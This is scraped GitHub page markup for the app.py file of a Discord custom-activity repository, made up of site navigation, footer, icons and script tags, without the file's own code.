style="cursor:pointer;" aria-label="Copy lines"> Copy lines </clipboard-copy> </li> <li> <clipboard-copy role="menuitem" class="dropdown-item" id="js-copy-permalink" style="cursor:pointer;" aria-label="Copy permalink"> Copy permalink </clipboard-copy> </li> <li><a class="dropdown-item js-update-url-with-hash" id="js-view-git-blame" role="menuitem" href="/agambajwa/discord-custom-activity/blame/9a6488f083af4b9c41113cffbb0b8e4356985c11/app.py">View git blame</a></li> <li><a class="dropdown-item" id="js-new-issue" role="menuitem" href="/agambajwa/discord-custom-activity/issues/new">Reference in new issue</a></li> </ul> </details-menu> </details> </div> </div> <details class="details-reset details-overlay details-overlay-dark" id="jumpto-line-details-dialog"> <summary data-hotkey="l" aria-label="Jump to line"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast linejump" aria-label="Jump to line"> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="js-jump-to-line-form Box-body d-flex" action="" accept-charset="UTF-8" method="get"> <input class="form-control flex-auto mr-3 linejump-input js-jump-to-line-field" type="text" placeholder="Jump to line&hellip;" aria-label="Jump to line" autofocus> <button data-close-dialog="" type="submit" data-view-component="true" class="btn"> Go </button> </form> </details-dialog> </details> <div class="Popover anim-scale-in js-tagsearch-popover" hidden data-tagsearch-url="/agambajwa/discord-custom-activity/find-definition" data-tagsearch-ref="master" data-tagsearch-path="app.py" data-tagsearch-lang="Python" 
data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.click_on_symbol&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;click_on_symbol&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0a8f6a41e955842b0be9a33175d7ebbdd2cb6543f0698dc9866704903cd61c36"> <div class="Popover-message Popover-message--large Popover-message--top-left TagsearchPopover mt-1 mb-4 mx-auto Box color-shadow-large"> <div class="TagsearchPopover-content js-tagsearch-popover-content overflow-auto" style="will-change:transform;"> </div> </div> </div> </div> </div> </div> </main> </div> </div> <div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-text-secondary border-top color-border-secondary "> <ul class="list-style-none d-flex flex-wrap col-12 col-lg-5 flex-justify-center flex-lg-justify-between mb-2 mb-lg-0"> <li class="mr-3 mr-lg-0">&copy; 2021 GitHub, Inc.</li> <li class="mr-3 mr-lg-0"><a href="https://docs.github.com/en/github/site-policy/github-terms-of-service" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to terms&quot;,&quot;label&quot;:&quot;text:terms&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="cad6f39ced678e86d7a5e96c023c0fa2c5891ec5b3616a49afcdaa21ee3d0c12">Terms</a></li> <li class="mr-3 mr-lg-0"><a href="https://docs.github.com/en/github/site-policy/github-privacy-statement" 
data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to privacy&quot;,&quot;label&quot;:&quot;text:privacy&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="263230e8c537a87a5634a289f54b032bfa6685a1a11a704bbf33de36a0553bab">Privacy</a></li> <li class="mr-3 mr-lg-0"><a data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to security&quot;,&quot;label&quot;:&quot;text:security&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="46892c668135bbb345714e41d8dd65b412a7bc1ac126e1104a21457b01280b3b" href="https://github.com/security">Security</a></li> <li class="mr-3 mr-lg-0"><a href="https://www.githubstatus.com/" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to status&quot;,&quot;label&quot;:&quot;text:status&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="850b1e9b63cf1369fce12635727170f159af2c820c10b435a1369da13f6a3b37">Status</a></li> <li><a data-ga-click="Footer, go to help, text:Docs" href="https://docs.github.com">Docs</a></li> </ul> <a aria-label="Homepage" title="GitHub" class="footer-octicon d-none d-lg-block mx-lg-4" href="https://github.com"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 
0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path> </svg> </a> <ul class="list-style-none d-flex flex-wrap col-12 col-lg-5 flex-justify-center flex-lg-justify-between mb-2 mb-lg-0"> <li class="mr-3 mr-lg-0"><a href="https://support.github.com?tags=dotcom-footer" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to contact&quot;,&quot;label&quot;:&quot;text:contact&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="ac4567556b973a5bf5d3c61161c07b927fab9772ddfb7e27055d611413f2acb4">Contact GitHub</a></li> <li class="mr-3 mr-lg-0"><a href="https://github.com/pricing" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to Pricing&quot;,&quot;label&quot;:&quot;text:Pricing&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="894887d6dd70a306a70bc2b360c5fc5e23117412d10a4253ebae837147aeab59">Pricing</a></li> <li class="mr-3 mr-lg-0"><a href="https://docs.github.com" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to 
api&quot;,&quot;label&quot;:&quot;text:api&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="78682afcd93486f1045fa60a8b86e5c164e42aa8441a136e07d508ea87437b6a">API</a></li> <li class="mr-3 mr-lg-0"><a href="https://services.github.com" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to training&quot;,&quot;label&quot;:&quot;text:training&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="7760f130353590dca4b2a6f009556a55c9558bb6cd58a07f3b606904080437a1">Training</a></li> <li class="mr-3 mr-lg-0"><a href="https://github.blog" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to blog&quot;,&quot;label&quot;:&quot;text:blog&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="bcabd5b32e60440ed8e25c81ce8fded52be950ccd0c53391aac6071ecf738b7c">Blog</a></li> <li><a data-ga-click="Footer, go to about, text:about" href="https://github.com/about">About</a></li> </ul> </div> <div class="d-flex flex-justify-center pb-6"> <span class="f6 color-text-tertiary"></span> </div> </div> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 
15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> <span class="js-stale-session-flash-signed-in" hidden>You signed in with another tab or window. <a href="">Reload</a> to refresh your session.</span> <span class="js-stale-session-flash-signed-out" hidden>You signed out in another tab or window. 
<a href="">Reload</a> to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-text-primary hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details> </template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div> </div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" 
data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path> </svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </clipboard-copy> </div> </template> <style> .user-mention[href$="/Bomzz06"] { color: var(--color-user-mention-fg); background-color: var(--color-user-mention-bg); border-radius: 2px; margin-left: -2px; margin-right: -2px; padding: 0 2px; } </style> </body> </html>
85.574602
16,258
0.683024
<!DOCTYPE html> <html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" integrity="sha512-d4XC7S3D2O/G0TvZjbbtWpDgCLyqvsXCX4K0DUJVfSwpV8ySOlchU43C/9mcyyHtCnczq4eoCl/e3fzC9uXxGA==" rel="stylesheet" href="https://github.githubassets.com/assets/light-7785c2ed2dc3d8efc6d13bd98db6ed5a.css" /><link crossorigin="anonymous" media="all" integrity="sha512-uEgC6AoKK1gK/XX3HlE4+2pdmfa3CUGgk9GV+7h+h0dtALsvueFLg+18JnwLD1axmkp744IzWjFcfHZTxmQyMQ==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-b84802e80a0a2b580afd75f71e5138fb.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-KQFKp2zcS4QM9du72skcYxPfuDslYljsOd9hsZFHSQl7WnkzjR0KkkuMbY7KFRWTerb8KbAYy11eD2ZoFgVyJg==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-29014aa76cdc4b840cf5dbbbdac91c63.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-Bldh8KfOmuQXEarLeCx5IxrQms1DznU4qGbQ6oCrAVNdd4jea40lyBHdddi7o1P4dhler91XHyO9+iBe7m6LzQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-065761f0a7ce9ae41711aacb782c7923.css" /><link data-color-theme="dark_protanopia" crossorigin="anonymous" media="all" integrity="sha512-ZTzLkJDxM5xDVGmjIyBfQBPzZ+qCtysiTQmLxFsZvozwCNcG4TgwuGWvSbKXxIGfD7rWNUt9kSyUyLxK1kMqhg==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_protanopia-653ccb9090f1339c435469a323205f40.css" 
/><link data-color-theme="light_protanopia" crossorigin="anonymous" media="all" integrity="sha512-S9e8SuxweN/gYIfZR+mVTRvfJGkdNlTmZzokT1GZ9KoGEcUjgtWlvihTLVoG3E9gssDhT62eoq6UEeOFjFuvFA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_protanopia-4bd7bc4aec7078dfe06087d947e9954d.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-+nVL2XvNtwumIdq12YtvhclBiE72DgFQr/ItWzUHymt6x2tCbYBg0DaLOy39bB+N4wmwNqQene1NORzhgfi/wQ==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-fa754bd97bcdb70ba621dab5d98b6f85.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-JhKolDx/FhHovKZsCFmQ2LKJwlyGRltUUDphBvVeSkv0Kl1vV4DpSpGXILf+CtiHubmHnqCOaBYpKb/rDjdAhQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-2612a8943c7f1611e8bca66c085990d8.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-/VP86KJoXAL8SaRo4I/QwqdgNg6xpeeb3JQ3gBKRLW76BBnBz3KCWJIKybR8px9wNNB6ixlzxDPAjkOSmRHODA==" rel="stylesheet" href="https://github.githubassets.com/assets/github-fd53fce8a2685c02fc49a468e08fd0c2.css" /> <script crossorigin="anonymous" defer="defer" integrity="sha512-bd5GjqJFbZLxlG4FXlu80JVzUSEHzxtnyyS98c3BaPbl32yravYkO9dNLUeI5QOm1XU7zIzJ0J5HOEQSfkgJOA==" type="application/javascript" src="https://github.githubassets.com/assets/environment-6dde468e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-c7dOB6hGd6OdYvUCrqXG0876tW5VQnJrRaBTz6kBjLZcGw2tKiXHfzDEiX5WEo1dseR2ilkdJPiZe1u0FrVhkg==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-73b74e07.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HKLxo1SCuvyND9pKagScspQtPtfYM442e7MMfig1ctv3M4xldrFt9nTLKE+KSshAfgn9839j9+BZPEeeUjJjKQ==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-1ca2f1a3.js"></script> <script crossorigin="anonymous" defer="defer" 
integrity="sha512-EaSGeSQFfxLpe/avYyWp+85njCuoiL1FSklaKpZW18T+zwAl6eUjL/gMoISAY62x7+aNOtNG9V7awsMzgkgiJw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-11a48679.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Fv0IGb7X6YOQOp7bIjfuvISOJJCEsBWtmrn3neVFkckbHHt4pT0+T0nDl2mwVb1RCWVvS1DcZstOPl+SRFb0oA==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-16fd0819.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5tWKSr7mhAzSh4Sx5YRFgKftdGxKwHKnOGYw5DlxjHhkQVURYFU3Bk5IMOGMKuAiJTlC3OXYM3xzGcyjzuEFQQ==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-e6d58a4a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-KT8PJraOSW8f9HMDRcjmyilvPC/PVT3Pd9NpBA036w4RRzXaJGd/cSB8JxswenJDhSAPuydYcePTx8wWv/5CQw==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-293f0f26.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ol5y71RI6PxIzSuxVDnwevlSWZzk4bNc3O/EjhN5zfx6VPqcyDOAiN9CoTydwOZwe2K3Jmu+85/EV19h4A13Uw==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-a25e72ef.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-DbpM4Xk+KtL8iCOI+ZACZGMdHN+r6aXCD2Wibv0FOD6mvDnGinYFYfj0BcPOrN5Ku2lJuhXylCh2wNDCLPBBeQ==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-0dba4ce1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xrMxZfj62OcLN3FgzDtzy+P688RoxGL3nmdd2r4qJEjQZq5ZkqBwD6WiRoV4Mhnds8Y7JQebMbRCTITdFlZytg==" type="application/javascript" 
data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-c6b33165.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vpt2Tdt20tOKRtrRWtOVaRi2wBoAaflNGUR6xuQgU/0Ywfxvbazq0C2hhKwuiC8b6A813gXGm+8fj0NCEosbYQ==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-be9b764d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-arflMFcVzVAYaP2n7m7gklPChWsVsCDtRPav2Cb6bqLeJf8pgbojWJ3EseKXILCIqfxl/v6arBduZ9SLmpMEZw==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-6ab7e530.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6j/oSF+kbW+yetNPvI684VzAu9pzug6Vj2h+3u1LdCuRhR4jnuiHZfeQKls3nxcT/S3H+oIt7FtigE/aeoj+gg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-ea3fe848.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VSSd+Yzi2iMS+pibY6hD/WdypxAEdob5F2RMKxuKcAHS2EpFYJPeTXoVxt0NXg03tfj2dka2mEtHS+vjpYSaDw==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-55249df9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ErqZFlIt7zIbLoZHvwfq9Zjo5zo+Y1A410nePDGvK+WVTVP10iNTfoqdOOSZNSy1gtLKIWDIIiOV30lr6zUJCA==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-12ba9916.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aiqMIGGZGo8AQMjcoImKPMTsZVVRl6htCSY7BpRmpGPG/AF+Wq+P/Oj/dthWQOIk9cCNMPEas7O2zAR6oqn0tA==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" 
data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-6a2a8c20.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-grRajv+ZiHV6dOdj1ZVsPoGYLqUr9lblDxPEuf6Fo3/GNfqIwV0NUvqiq05w68106TDk/g3iUkpOjDEpiEepuA==" type="application/javascript" data-module-id="./chunk-failbot.js" data-src="https://github.githubassets.com/assets/chunk-failbot-82b45a8e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3jmKS/bkQpYNk9QJJ6D0y6iGTh7Lu2UVD/QLZZqutFE7e3IXxhEbQX0GXbl0PQWZ6whWKViOT3pOf/5zcaCXcA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-de398a4b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-OszE/6GlmrYt3ALid4xVFd3/4d9cUH08ndFsO7vs/RHCz2bJ8+UsbjBc8wf09hyCOe9PuEgW0HDWpD32xMio2Q==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-3accc4ff.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-BV7wU3kptBGiv52rPu5ez9Fp8hDs9NxIm75USxtiip+HjDhStyYpG7hQMatWFmoYcumArHN0IAbC0b8XJfg+Hw==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-055ef053.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-JuwLQc/GiXiL3aQZ3y52X1UWniOU21IfTqzwnrfsFgxCwwhPUgh7KcIHb2oTxGC+yi7k5KN1mGVRifLWQMcfVw==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-26ec0b41.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4Wq8F/+bu5aXHG0CFx4Z1Whiip3tIAR70gvZgZtx8HiTLyBdzEUSSA9Soe3c67SUGuiJQB834x/1sse1bxBmeg==" type="application/javascript" data-module-id="./chunk-invitations.js" 
data-src="https://github.githubassets.com/assets/chunk-invitations-e16abc17.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AifR/xlMdAmSB9UcJEPQ16P863/ZqDphDeGKBZSPuSgsNaaehDErJfLCn1saUs0o0fAuM0jr+Sxr4HtQp7qpBA==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-0227d1ff.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-G/DI+JNZR6uAoSYxBCT6GSHHvZgBBCF1S40IIX/C797hFmg10tGcnlCbv3AzbBsPRPfQlh0GKZv5019fihsLow==" type="application/javascript" data-module-id="./chunk-keyboard-shortcuts-helper.js" data-src="https://github.githubassets.com/assets/chunk-keyboard-shortcuts-helper-1bf0c8f8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3q9CgTtVlQ6fkBQRgpwkwOZ+3tHjtGqOJeAI+Vp4bbcig2h1mR9iRJG2ohClN8+YThWAOBxizc8R/yrZPbxNSw==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-deaf4281.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-m2VwI1wpMT5jpAzQLL7sVG0WkxzNAiBXeitEnh0A2tUHb+r4sVRzoR8PAyf0+zUkEDO5Ne5DBWO7gM2FtdT7cw==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9b657023.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7G7VNhRoIxfK6aKTgUSUtMHI6U0k+szgDfwZIEcKuQKs+K0XZGfVivusB0NlOy78zixfFSI7NHzmvHike+5uyQ==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-ec6ed536.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7hZ031ngiF36wGsfcoyyCWTqwYxjX+qeTLtCV7CJ+IO+wzkzCm1RoR3WzWczfWmwLNqr+Hu3kQOgkBaGn4ntWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" 
data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-ee1674df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ow4QYm35S5iR6nm/e/tx16lHUTK8pg1Ke1asLBVj6HzevTuo7S0GcL+7sWjvKOBvrVLgbwyPzfth75Vs6L3ePQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-a30e1062.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-wXlv/QM4OsXYyUuSfFjx3XqSmvfLqtjvBx6wFlGNmHzd6Dkmr1HkTZs1qpCYTCjiyw1zm5ORa4O4gWAKc+cKPw==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-c1796ffd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4O3AMK3FmKoTDmbBwFGIg+rNW3s73lJFQNLSBF1bczsjNsi8zT2t54vTwY1cMG1dox6Nt11wRGhevi1wxOFhWw==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-e0edc030.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-hgoSKLTlL8I3IWr/TLONCU+N4kdCtdrHCrrud4NKhgRlLrTw0XUPhqBaDdZUiFSzDQRw/nFQ1kw2VeTm0g9+lA==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-860a1228.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7KSTAXtI9DmFWoq8LjFSgxvvQZBoKHjyN5ZBzEWZ39P/CSWrQf/VaVKd0zpkd8vDk7mq7bcDSniipoFbjTABUA==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-eca49301.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nOP8bLqNZgktv1/5mFrm9LhZDgozlsEbAj/XuQ35rxK/NNbqAmBDfeXQ+pkY5SXDd/8Bz/+RGfwr3FHL2sopSQ==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" 
